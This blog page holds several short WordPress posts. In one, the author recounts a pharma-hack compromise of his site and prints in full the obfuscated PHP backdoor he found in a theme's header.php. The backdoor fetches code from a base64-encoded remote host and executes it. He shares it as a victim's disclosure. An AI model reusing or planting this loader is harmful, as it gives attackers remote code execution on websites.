How To Use Vagrant And Git To Develop A WordPress Theme

 

Sometimes I like to sit down and play with technology. My colleague Mike Shroder mentioned VVV a few weeks ago and I had to try it. Check out this tutorial I wrote on how to create a new WordPress site, use Vagrant and git to develop a new theme locally, then push the modifications to a live site running on DreamHost (but it could run anywhere else, really).

Source: How To Use Vagrant And Git To Develop A WordPress Theme

Getting busy on the blog for the wrong reasons

I’ve been spending lots of time on this blog but not for good reasons. I’m currently under the attack of the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my wordpress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use.  I changed the ftp password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.

UPDATE: I think I found the backdoor  that the bastard is using. It was in the header.php of one of the templates:

<?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,’$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url[“scheme”]) || !in_array($_url[“scheme”],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url[“host”],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0rnHost: “.$_url[“host”].”rnConnection: Closernrn”; @fwrite($f,$s); $txt=””; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”rnrn”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=””; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”” && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess[‘uptime’]!=””){ unset($sess_f); $sess_f=create_function(“$a”,$sess[‘uptime’]); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>

Lets see how long this lasts.

Upgraded wordpress, closing the week

This WordPress needed some maintainance, but this time instead of upgrading ‘manually’ I decided to use the WordPress Automatic Upgrade Plugin: boy, it was fast and simple. It seems to be working fine.’  If you spot any glitches let me know. Now for me it’s time to go play with the RC minihelicopter and away from computers.

Tomorrow I’ll meet Hal in person for the first time at Malpensa while he is flying to Barcelona for the MWC: I’ll take pictures 🙂

Small changes to the blog

I’ve started the new tag system offered by WordPress 2.3.1 a few weeks ago and I’ve also stopped using the categories. I left them on because I didn’t want to change the archives.’  I’m still looking for a way to deal with dual language posts: WordPress seems not to support natively multiple languages (we talked at the Cena Lunga about this with Giacomo and LK).’  I thought of using different categories, it and eng, but I’m not sure how to achieve separate feeds. Gengo seems too complicated and doesn’t work on 2.3.1anyway, other solutions I found seem abandoned. Does anybody know of a *stable* solution to mark posts as Italian or English, offering two separate feeds?

While I was playing with WP I’ve added two new widgets: one from twitter (more freaky experimenting with social networks) and the new FSF fund raising widget. Put it on your blog too and give yourself a nice Christmas present donating to FSF. Did you know they have also a fund to support the defense of poor moms and kids against the RIAA lawsuits?